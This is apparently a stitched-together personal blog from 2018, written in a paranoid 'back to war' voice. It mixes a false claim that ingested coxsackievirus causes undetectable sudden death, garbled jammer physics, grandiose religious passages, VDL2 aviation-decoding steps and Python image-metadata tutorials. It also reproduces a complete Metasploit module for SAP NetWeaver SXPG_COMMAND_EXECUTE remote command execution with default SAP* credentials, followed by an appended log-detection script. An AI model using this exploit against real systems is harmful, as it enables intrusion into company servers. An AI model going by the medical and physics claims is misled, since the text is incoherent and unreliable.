Good morning! Welcome back to war! Thursday, 08.25 am! I found "funny" the MI6 recommendation on the Embassy site, saying to be careful with terrorism (...basic shit) and gastrointestinal diseases at Portugal!!!! (????) I just realized how stupid I am, that didn't immediately recognize the mice trap!!!! ...so let me explain to you...The enteroviruses are a family of viruses that usually enter the body by infecting the gastrointestinal tract. ...one of them is ...coxsackievirus b that provokes myocarditis (heart inflammation) ....which provokes sudden heart arrest, from 2 to 10 hours...and the virus is undetectable because its replication is based on necrosis (the virus kills, eats, the virus) ...therefore...by a simple ingestion of the virus in food, what was a gastrointestinal common shit...will be the sudden death of the artist! And..."be careful while travelling to Portugal in holidays"
Thursday, May 17, 2018
Wednesday, May 16, 2018
..back to war! So, about the subject "flight mode" counter attack...let's just begin by defining that air traffic uses a different TCP/IP protocol like VDL 2...this is something they don't expect...if our communications are made in an obsolete (we might say it like this) SDR receiver... they will stay without no way, as their jammers are looking for typical Bluetooth inside the wireless network, or RF microwave...of jamming this system...here's how to install
The VDL2 (for "VHF Data Link mode 2") mode permits automatic transmissions between planes and ground stations, with an exchange of different pieces of information (and especially positions) through AVLC frames (I, UI, RR, XID...) very close to Packet frames. It is a short distance (400 km maximum) service proposed through a network of VHF ground stations (on 136.975 MHz mainly but also 136.875 MHz in Europe). It gradually replaces the ACARS mode.
- The simplest way to decode this mode is to directly demodulate 8PSK frames by MultiPSK, with a SDR receiver (FUNcube Dongle, for example) connected to MultiPSK and the SDR interface started (on the Configuration screen). Adjust the SDR frequency on 136963 kHz and the waterfall frequency on 12 kHz (making it 136.975 MHz).
Or adjust the SDR frequency on 136863 kHz and the waterfall frequency on 12 kHz (making it 136.875 MHz).
The I/Q PSK demodulation will be done by Multipsk, as will the decoding.
- However, a standard USB receiver can be used (both solutions are equivalent from a performance point of view). In this case, the reception central frequency must be shifted by 12 kHz, i.e. the frequency on the USB receiver must be adjusted to 136.963 MHz (136963 kHz instead of 136975 kHz). Of course, the SDR interface on Multipsk must not be started.
The frequency must be very precisely adjusted (tolerance: +/- 50 Hz).
"end quote"
As of July 2016 the following 4 frequencies have been found to be active in Europe:
136.725 MHz dedicated to ARINC
136.775 MHz dedicated to SITA
136.875 MHz dedicated to SITA
136.975 MHz ARINC shared with SITA
Connect the dongle to MultiPSK
RTL dongle specific settings
Setting the VDL2 Mode
Setting the frequency
Coarse frequency adjustment
Fine frequency adjustment
Connecting MultiPSK to Plane Plotter
PLANEPLOTTER.PBWORKS.COM
tactical jammers position ..drones...
welcome back to war! So, dear friends, what are the important aspects to know about their projectiles sent by cannons to disrupt communications? 1. they send the jammers through a tactical method which is "two coherent waves traveling along two different paths to the same point will interfere destructively" this means we have to detect two positions, inside their target area, that are sending radio signals, through projectiles. 2. Do not forget that these jammers are deployed by drones and hot balloons 3. and most important, while we are under attack, put all electronic wireless under "flight mode"
ok, before we go to the "flight mode" counter attack..just to refer a detail, on this communication disruption; so, we are emitting a coherent radio frequency (between 20 and 2020 MHz) on two different locations, destined for the same target, deployed by a drone. To be effective the disruption, based on Physics, is that between the two jamming signals, must have half distance of the wavelength, between them. So if we deploy one at 20 miles (for example), the other one must be emitting at 10 miles distance
Tuesday, May 15, 2018
CODE IS ...
....A simple wrapper around exiv2...
A simple wrapper around the C++ Exiv2 library for reading and writing image metadata.
Requires that the exiv2 C++ library is installed.
Usage
gem install exiv2
if you get errors with header could not be found below:
exiv2.cpp:1:10: fatal error: 'exiv2/image.hpp' file not found
#include "exiv2/image.hpp"
please explicitly declare the header path
gem install exiv2 -- --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"
On OSX with Homebrew's exiv2, EXIV2_PREFIX can be set:
export EXIV2_PREFIX=$(brew --prefix exiv2)
If you get this error while trying to install as part of a bundle install, you can set these paths using:
bundle config build.exiv2 --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"
If you are on a new version of Command Line Tools (that is, newer than 6.2) and bump into the following error:
/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1/iterator:341:10: fatal error: '__debug' file not found
#include <__debug>
You can follow the quick hack by touching a new file /Library/Developer/CommandLineTools/usr/include/c++/v1/__debug with content:
#ifndef _LIBCPP_ASSERT
#define _LIBCPP_ASSERT(...) ((void)0)
#endif
Once everything is successfully installed, you can give it a go:
require 'exiv2'

# Open the image and load its metadata
image = Exiv2::ImageFactory.open("image.jpg")
image.read_metadata

# Print every IPTC, Exif and XMP entry
image.iptc_data.each do |key, value|
  puts "#{key} = #{value}\n"
end
image.exif_data.each { |key, value| puts "#{key} = #{value}" }
image.xmp_data.each { |key, value| puts "#{key} = #{value}" }

# Convert metadata to plain hashes
iptc_data_hash = image.iptc_data.to_hash
xmp_data_hash = image.xmp_data.to_hash

# Delete, replace and add entries
image.exif_data.delete("Exif.Image.Software")
image.iptc_data.delete_all("Iptc.Application2.Keywords")
image.iptc_data["Iptc.Application2.Caption"] = "A New Caption"
image.iptc_data.add("Iptc.Application2.Keywords", "fishy")

# Write the changes back to the file
image.write_metadata
welcome back...to war! "Not that I'm currently cruising for jobs with British intelligence or anything, but I happened upon (via Hacker News) this current coding challenge posted to the MI5 careers page...."
Prerequisites: Assuming you've already downloaded and installed Python, you should do two things. One: spend 10 minutes doing this "Hello, World" Python for non-programmers tutorial. Two: spend another five minutes doing this tutorial on using Python modules.
0.0) Install Pillow
The active version of PIL is actually known as Pillow, so this is what we need to install. You should do this with the Python package manager pip, which is covered in the second prerequisite tutorial above. Just:
pip install pillow
Now, create a new Python script in whatever text editor you like. I'm using Sublime Text, which is great. I called my script metaread.py.
1.0) Create an Image object
First thing we're going to do is actually bring in the Pillow module we installed, which is the first line below. Next, we need to create an object representation of our MI5 image, puzzle.png. This exposes the image and all of the things we can do with it via the Pillow module to our Python script. To see some more of these capabilities, check out Hack This: Edit an Image in Python.
from PIL import Image

# Load the MI5 puzzle image named in the text
image = Image.open("puzzle.png")
2.0) Extract the Exif data
Not all image formats contain Exif data. Mostly just JPGs. Which is fine because that's most pictures. The MI5's image is actually a .PNG file, which we'll have to handle somewhat differently. Let's do a quick JPG though.
There's really nothing to it. I create the image object as above then call the _getexif() function on it. In return, I get a dictionary data structure full of metadata.
The dictionary consists of tag-value pairs, which we can extract and view using a for-loop, like this. Note that I had to import some extra stuff at the top:
from PIL import Image
from PIL.ExifTags import TAGS, GPSTAGS

image = Image.open("gpsample.jpg")
print(image)
info = image._getexif() or {}  # _getexif() returns None when the file has no Exif data
for tag, value in info.items():
    key = TAGS.get(tag, tag)  # unknown tags keep their numeric id
    print(str(key) + " " + str(value))
So, that just outputs all of the Exif data contained within a given image as a series of entries. It's hardly guaranteed to be the same for every image. I had to search online for a sample image containing GPS metadata because I got tired of scanning through everything on my computer trying to find an example (though it wouldn't be too hard to write a script that could comb through a file of images and automatically pull out those that do include it). In any case, you can find the same image here.
A sampling of the output:
GPSInfo {0: '\x00\x00\x02\x02', 1: u'S', 2: ((33, 1), (51, 1), (2191, 100)), 3: u'E', 4: ((151, 1), (13, 1), (1173, 100)), 5: '\x00', 6: (0, 1)}
ISOSpeedRatings 100
ResolutionUnit 2
WhiteBalance 0
GainControl 0
BrightnessValue (100, 10)
2.1) Extract non-Exif data
Again, PNGs don't come with Exif data.
Don't panic. Just because it's not in Exif format doesn't mean that puzzle.png's metadata is all that more difficult to access.
It so happens that when an image is loaded per step 1.0, the PIL module will automatically load up a dictionary with whatever metadata it can id. We can barf it all out to the screen with a simple print statement:
print(image.info)
Or we can loop through it as in 2.0 as such:
for tag, value in image.info.items():
    key = TAGS.get(tag, tag)
    print(str(key) + " " + str(value))
Problem solved?
So, at this point I need to confess that this .info method is not actually returning all of the metadata from puzzle.png, and I don't quite know why. In addition to regular old Photoshop and the ExifRead Python tool mentioned above, I also tried four different online metadata extraction tools and only one was able to return a complete listing: Jeffrey Friedl's Image Metadata Viewer. Said viewer is based on a command-line tool called ExifTool, which I downloaded and ran. It too worked.
But I promised Python and Python we shall write. It's actually pretty easy to run a command-line program from within Python, but you'll still have to download the actual command line program, which is available here. Now, we can run this script on our image file, and the ExifTool will output the result via Python to the screen. Try it.
import os
os.system('exiftool -h puzzle.png')
See the clue?
I don't know why it was so difficult to pull metadata from this file. It may have something to do with how metadata in PNG files is laid out. Within the file, metadata is kept in data structures called chunks. Chunks are given weird coded names that define, among other things, whether they should be considered "critical" or not. Critical chunks include actual image data, bit depth, and color palette. Not-critical chunks offer histograms, gamma values, default background colors, and, finally, text. There are three different types of text chunks all with a standard dictionary entry format. Each text entry has a name or title, and then some associated text. They can be user-defined, but there are some text field types that come predefined, such as "comment." Which in our MI5 file contains this:
https://motherboard.vice.com/en_us/article/aekn58/hack-this-extra-image-metadata-using-python
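The chunk layout described above can be walked directly with the standard library. This is an added example, not code from the article: it goes a little beyond the text by verifying each chunk's CRC and reading all three text chunk kinds (tEXt, zTXt, iTXt), and the sample PNG with its keywords and text is constructed in memory.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_TYPES = (b"tEXt", b"zTXt", b"iTXt")

def make_chunk(ctype, data):
    # Chunk layout: 4-byte length, 4-byte type, data, CRC-32 over type + data.
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def iter_chunks(png):
    # Yield (type, data, crc_ok) for every chunk after the 8-byte signature.
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype, end = png[pos + 4:pos + 8], pos + 8 + length
        if end + 4 > len(png):
            raise ValueError("truncated chunk %r" % ctype)
        data = png[pos + 8:end]
        (crc,) = struct.unpack(">I", png[end:end + 4])
        yield ctype, data, crc == (zlib.crc32(ctype + data) & 0xFFFFFFFF)
        pos = end + 4

def is_critical(ctype):
    # Bit 5 of the first type byte: clear (uppercase) = critical, set = ancillary.
    return not ctype[0] & 0x20

def text_entries(png):
    # Return [(chunk_type, keyword, text)] for all intact text chunks.
    out = []
    for ctype, data, crc_ok in iter_chunks(png):
        if not crc_ok or ctype not in TEXT_TYPES:
            continue
        keyword, _, rest = data.partition(b"\x00")
        if ctype == b"tEXt":
            text = rest.decode("latin-1")
        elif ctype == b"zTXt":          # method byte, then a zlib stream
            text = zlib.decompress(rest[1:]).decode("latin-1")
        else:                           # iTXt: flag, method, lang\0, translated keyword\0, text
            body = rest[2:].split(b"\x00", 2)[2]
            text = (zlib.decompress(body) if rest[0] else body).decode("utf-8")
        out.append((ctype.decode("ascii"), keyword.decode("latin-1"), text))
    return out

def build_sample_png():
    # Constructed 1x1 grayscale PNG carrying one text chunk of each kind.
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    return (PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"tEXt", b"Comment\x00constructed sample comment")
            + make_chunk(b"zTXt", b"Note\x00\x00" + zlib.compress(b"compressed note"))
            + make_chunk(b"iTXt", b"Title\x00\x00\x00en\x00\x00constructed title")
            + make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
            + make_chunk(b"IEND", b""))

if __name__ == "__main__":
    for entry in text_entries(build_sample_png()):
        print(entry)
```

To inspect a real file, pass `open("puzzle.png", "rb").read()` to `text_entries` in place of the constructed sample.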
Monday, May 14, 2018
back to war! so...who wants completely secure communications, and probable tv broadcast jammers ?
http://www.goscas.com/china-high_power_ka_band_point_to_point_microwave_antennas_dual_polarization-5650098.html
Maybe I am semi Goddess ...I keep on saying to invisible Jesus my Lord, you better have a very special place for me in Paradise, since I'm being used by God, for some task and purpose I don't know what it is, and I'm not being paid!!!!! Maybe Jesus got my Mother pregnant, when she was for 3 years trying, picked my Mother specially for a truly Queen taste. And keep me here, using my rage, on a world that should have made me very very rich...keep me here poor and prisoner. Maybe Jesus architect this story, by making me, not a top model, but the most loved girl in the world...for a sexy look, that I had for years, (and still have) that its universal ; a sexy look, that Jesus carefully studied on Men's preferences....My natural talent for espionage...My giant megalomania views. ...My realism ...my pure heart...my good intentions...and horrible revenges ....as we spoke, the phone rang ...my Mother telling (us) the old men has a lottery in his pocket for me...didn't say how much or when he would give me...
we live in times, where computers are nano sized and can penetrate your skin. God has a task for me, for all my friends gather at my house. Jesus said.."if I told you, your actions in the future, you would change them" He downloaded me, terabytes of information...Jesus said to me what was our part, how the "war" will end...but He keeps the lottery ticket in His pocket, not saying how much and when He will give it to us.
Sunday, May 13, 2018
Some people just seem to enjoy hacking SAP :) ...back to war! ...just wait for maintenance....
require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::CmdStagerVBS
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution',
      'Description' => %q{
        This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP
        SOAP RFC Service, to execute remote commands. This module needs SAP credentials
        with privileges to use the /sap/bc/soap/rfc in order to work. The module has been
        tested successfully on Windows 2008 64 bits and Linux 64 bits platforms.
      },
      'References' => [ ],
      'DisclosureDate' => 'May 8 2012',
      'Platform' => ['win', 'unix'],
      'Targets' => [
        [ 'Linux',
          {
            'Arch' => ARCH_CMD,
            'Platform' => 'unix'
            #'Payload' =>
            #{
            #'DisableNops' => true,
            #'Space' => 232,
            #'Compat' =>
            #{
            #'PayloadType' => 'cmd',
            #'RequiredCmd' => 'perl ruby',
            #}
            #}
          }
        ],
        [ 'Windows x64',
          {
            'Arch' => ARCH_X86_64,
            'Platform' => 'win'
          }
        ]
      ],
      'DefaultTarget' => 0,
      'Privileged' => false,
      'Author' => [ 'nmonkee' ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('CLIENT', [true, 'SAP Client', '001']),
        OptString.new('USERNAME', [true, 'Username', 'SAP*']),
        OptString.new('PASSWORD', [true, 'Password', '06071992'])
      ], self.class)
    register_advanced_options(
      [
        OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
      ], self.class)
  end

  def send_soap_request(data)
    res = send_request_cgi({
      'uri' => '/sap/bc/soap/rfc',
      'method' => 'POST',
      'data' => data,
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
      'ctype' => 'text/xml; charset=UTF-8',
      'headers' => {
        'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
      },
      'vars_get' => {
        'sap-client' => datastore['CLIENT'],
        'sap-language' => 'EN'
      }
    })
    return res
  end

  def build_soap_request(command, sap_command, sap_os)
    data = "\r\n"
    data << "http://www.w3.org/2001/XMLSchema
    data << "\r\n"
    data << "http://schemas.xmlsoap.org/soap/encoding/
    data << "#{command} \r\n"
    data << "#{sap_command} \r\n"
    data << "#{sap_os} \r\n"
    data << " \r\n"
    data << "
    data << "
    data << "
    return data
  end

  def check
    data = rand_text_alphanumeric(4 + rand(4))
    res = send_soap_request(data)
    if res and res.code == 500 and res.body =~ /faultstring/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    if target.name =~ /Windows/
      linemax = datastore['PAYLOAD_SPLIT']
      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
      execute_cmdstager({ :delay => 0.35, :linemax => linemax })
    elsif target.name =~ /Linux/
      file = rand_text_alphanumeric(5)
      stage_one = create_unix_payload(1,file)
      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
      res = send_soap_request(stage_one)
      if res and res.code == 200 and res.body =~ /External program terminated/
        print_good("#{rhost}:#{rport} - Payload dump was successful")
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
      end
      stage_two = create_unix_payload(2,file)
      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
      send_soap_request(stage_two)
    end
  end

  def create_unix_payload(stage, file)
    command = ""
    if target.name =~ /Linux/
      if stage == 1
        my_payload = payload.encoded.gsub(" ", "\t")
        my_payload.gsub!("&", "&")
        my_payload.gsub!("<", "<")
        command = "-o /tmp/" + file + " -n pwnie" + "\n!"
        command << my_payload
        command << "\n"
      elsif stage == 2
        command = "-ic /tmp/" + file
      end
    end
    return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
  end

  def execute_command(cmd, opts)
    command = cmd.gsub(/&/, "&")
    command.gsub!(/%TEMP%\\/, "")
    data = build_soap_request("&#{command}", "LIST_DB2DUMP", "Windows NT")
    begin
      res = send_soap_request(data)
      if res and res.code == 200
        return
      else
        if res and res.body =~ /faultstring/
          error = res.body.scan(%r{(.*?) })
          0.upto(error.length-1) do |i|
            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
          end
        end
        print_status("#{res.code}\n#{res.body}")
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
    end
  end
end
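A log check for the traffic pattern this module produces, added here as an example and not part of the original post or of Metasploit: the Windows path sends its payload as a series of small POSTs to /sap/bc/soap/rfc with a 0.35 s delay, and the default USERNAME is SAP*. The log layout, the thresholds and every sample line (documentation-range IPs, the RFCUSER account) are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

RFC_PATH = "/sap/bc/soap/rfc"   # endpoint the module posts to
DEFAULT_USER = "SAP*"           # the module's default USERNAME option

# Assumed log layout: ip - user [ISO timestamp] "METHOD url HTTP/x" status bytes
LINE_RE = re.compile(r'(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def rfc_posts(lines):
    """Parse lines and keep only POSTs to the SOAP RFC endpoint."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, user, ts, method, url, status = m.groups()
        path = url.split("?", 1)[0].rstrip("/").lower()
        if method == "POST" and path == RFC_PATH:
            yield ip, user, datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f"), int(status)

def find_bursts(lines, min_hits=5, window=timedelta(seconds=10)):
    """Return {ip: most RFC POSTs seen inside one window} for noisy sources."""
    stamps = defaultdict(list)
    for ip, _user, ts, _status in rfc_posts(lines):
        stamps[ip].append(ts)
    flagged = {}
    for ip, times in stamps.items():
        times.sort()
        start = best = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window:   # slide the window forward
                start += 1
            best = max(best, end - start + 1)
        if best >= min_hits:
            flagged[ip] = best
    return flagged

def default_account_sources(lines):
    """Return the source IPs that called the endpoint as SAP*."""
    return {ip for ip, user, _ts, _st in rfc_posts(lines) if user.upper() == DEFAULT_USER}

URL = RFC_PATH + "?sap-client=001&sap-language=EN"
SAMPLE_LOG = [  # constructed: six POSTs 0.4 s apart from one source
    '203.0.113.7 - SAP* [2018-05-13T10:00:0%d.%03d] "POST %s HTTP/1.1" 200 512'
    % (i * 4 // 10, i * 400 % 1000, URL) for i in range(6)
] + [           # constructed: widely spaced integration traffic and an unrelated GET
    '198.51.100.20 - RFCUSER [2018-05-13T09:00:00.000] "POST %s HTTP/1.1" 200 512' % URL,
    '198.51.100.20 - RFCUSER [2018-05-13T09:30:00.000] "POST %s HTTP/1.1" 200 512' % URL,
    '203.0.113.7 - - [2018-05-13T09:59:58.000] "GET /sap/public/ping HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    print(find_bursts(SAMPLE_LOG), default_account_sources(SAMPLE_LOG))
```

Restricting /sap/bc/soap/rfc to the accounts and hosts that need it, and removing the default SAP* credentials, closes the access the module's description says it depends on.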